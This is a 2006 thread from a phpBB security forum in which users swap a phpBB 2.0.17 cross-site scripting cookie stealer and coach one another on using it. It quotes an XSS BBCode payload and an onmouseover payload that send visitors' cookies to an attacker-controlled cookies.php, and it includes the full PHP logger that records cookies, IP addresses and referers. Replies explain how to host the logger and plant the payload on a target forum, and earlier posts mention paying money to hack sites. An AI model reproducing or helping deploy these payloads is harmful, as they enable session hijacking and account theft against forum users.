Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 28, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 534
Members: 0
Total: 534
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> l Goto page 1, 2  Next
Post new topic  Reply to topic View previous topic :: View next topic 
l
PostPosted: Fri Feb 10, 2006 6:14 pm Reply with quote
oobiingzoo
Beginner
Beginner
 
Joined: Feb 10, 2006
Posts: 4




fjjj


Last edited by oobiingzoo on Thu Sep 28, 2006 5:28 pm; edited 1 time in total
View user's profile Send private message
PostPosted: Sat Feb 11, 2006 6:56 am Reply with quote
subzero
Valuable expert
Valuable expert
 
Joined: Mar 16, 2005
Posts: 42




btw what money are you talking about...

http://kisobox.com/exploits/phpbb.2.0.17.xss+cookies.stealer.txt

well have fun Laughing
View user's profile Send private message Visit poster's website
PostPosted: Sat Feb 11, 2006 6:10 pm Reply with quote
oobiingzoo
Beginner
Beginner
 
Joined: Feb 10, 2006
Posts: 4




hh


Last edited by oobiingzoo on Thu May 17, 2007 4:33 am; edited 1 time in total
View user's profile Send private message
PostPosted: Sun Feb 12, 2006 1:04 am Reply with quote
is0t0pe
Regular user
Regular user
 
Joined: Jan 10, 2006
Posts: 13




I think its against the rules to pay people real money to hack sites...
View user's profile Send private message
PostPosted: Sun Feb 12, 2006 1:52 am Reply with quote
subzero
Valuable expert
Valuable expert
 
Joined: Mar 16, 2005
Posts: 42




thats his problem to make real or fake money for hacking. Wink
point is exploits with greater version number are spread in the wild,tell me why you go for this later version? Laughing
View user's profile Send private message Visit poster's website
PostPosted: Sun Feb 12, 2006 3:33 am Reply with quote
oobiingzoo
Beginner
Beginner
 
Joined: Feb 10, 2006
Posts: 4




bgg


Last edited by oobiingzoo on Thu May 17, 2007 4:34 am; edited 1 time in total
View user's profile Send private message
PostPosted: Sun Feb 12, 2006 11:53 am Reply with quote
syntax9
Active user
Active user
 
Joined: Dec 21, 2005
Posts: 33




check your pm's ><
View user's profile Send private message
PostPosted: Mon Feb 13, 2006 1:37 pm Reply with quote
oobiingzoo
Beginner
Beginner
 
Joined: Feb 10, 2006
Posts: 4




gggg


Last edited by oobiingzoo on Thu May 17, 2007 4:34 am; edited 1 time in total
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 12:28 pm Reply with quote
Bill324
Regular user
Regular user
 
Joined: Apr 07, 2006
Posts: 11




subzero wrote:


http://kisobox.com/exploits/phpbb.2.0.17.xss+cookies.stealer.txt


On there it has a script,

Quote:
[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'


cookies.php

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('log.txt', 'a');
fwrite($fp,
'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?>


How do I use this Laughing Do I fill in the gaps with my website or the website im attempting to get.
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 2:19 pm Reply with quote
Aryan-Husky
Active user
Active user
 
Joined: Apr 03, 2006
Posts: 37




Upload the php as a file called cookies.php to your webserver and then call it in a post on a target forum. Watch the video on kisobox.
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 5:11 pm Reply with quote
Bill324
Regular user
Regular user
 
Joined: Apr 07, 2006
Posts: 11




Ok this confuses me, I have viewed the video.

And Have tried to follow as best as I could here is what happens:

1. I copied that script and placed it as cookies.php on the server.

2. Then I attempted to post this in a thread on my forum (Im testing it),

Code:
<pre a=">" onmouseover='document.location="http://localhost/cookies.php?c="+document.cookie' b="<pre" >
[img]http://www.punchstock.com/image/imagesource/4794232/large/is29020.jpg[/img]


But, when I do I get just a blank post. All html is enabled and that, I have changed the code:

Code:
 http://localhost/cookies.php


To my new cookies file.

So, basically the post comes up blank, NO IMAGE whatsoever.

Any ideas plz? Very Happy [/code]
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 10:41 pm Reply with quote
sljyro
Advanced user
Advanced user
 
Joined: Mar 23, 2006
Posts: 53




well it looks like you're doing everything fine.

i would suggest for you to test it online, just go to the target board, and test it by 'preview' post on yourself, and if you get redirected, check your log.txt if the details have been logged. then its all fine!
View user's profile Send private message
PostPosted: Sat Apr 08, 2006 7:05 am Reply with quote
Bill324
Regular user
Regular user
 
Joined: Apr 07, 2006
Posts: 11




Where is my log.txt Shocked I didnt make one, I just have my cookies.php Embarassed
View user's profile Send private message
PostPosted: Sun Apr 09, 2006 1:10 am Reply with quote
sljyro
Advanced user
Advanced user
 
Joined: Mar 23, 2006
Posts: 53




in cookies.php there is this code
Code:
$fp = fopen('log.txt', 'a');


so yeah, make a log.txt or any .txt file and change the code Smile
View user's profile Send private message
PostPosted: Sun Apr 09, 2006 7:59 am Reply with quote
Bill324
Regular user
Regular user
 
Joined: Apr 07, 2006
Posts: 11




Where shall I put my log. On the server? Shocked
View user's profile Send private message
l
  www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 2  
Goto page 1, 2  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.185 Seconds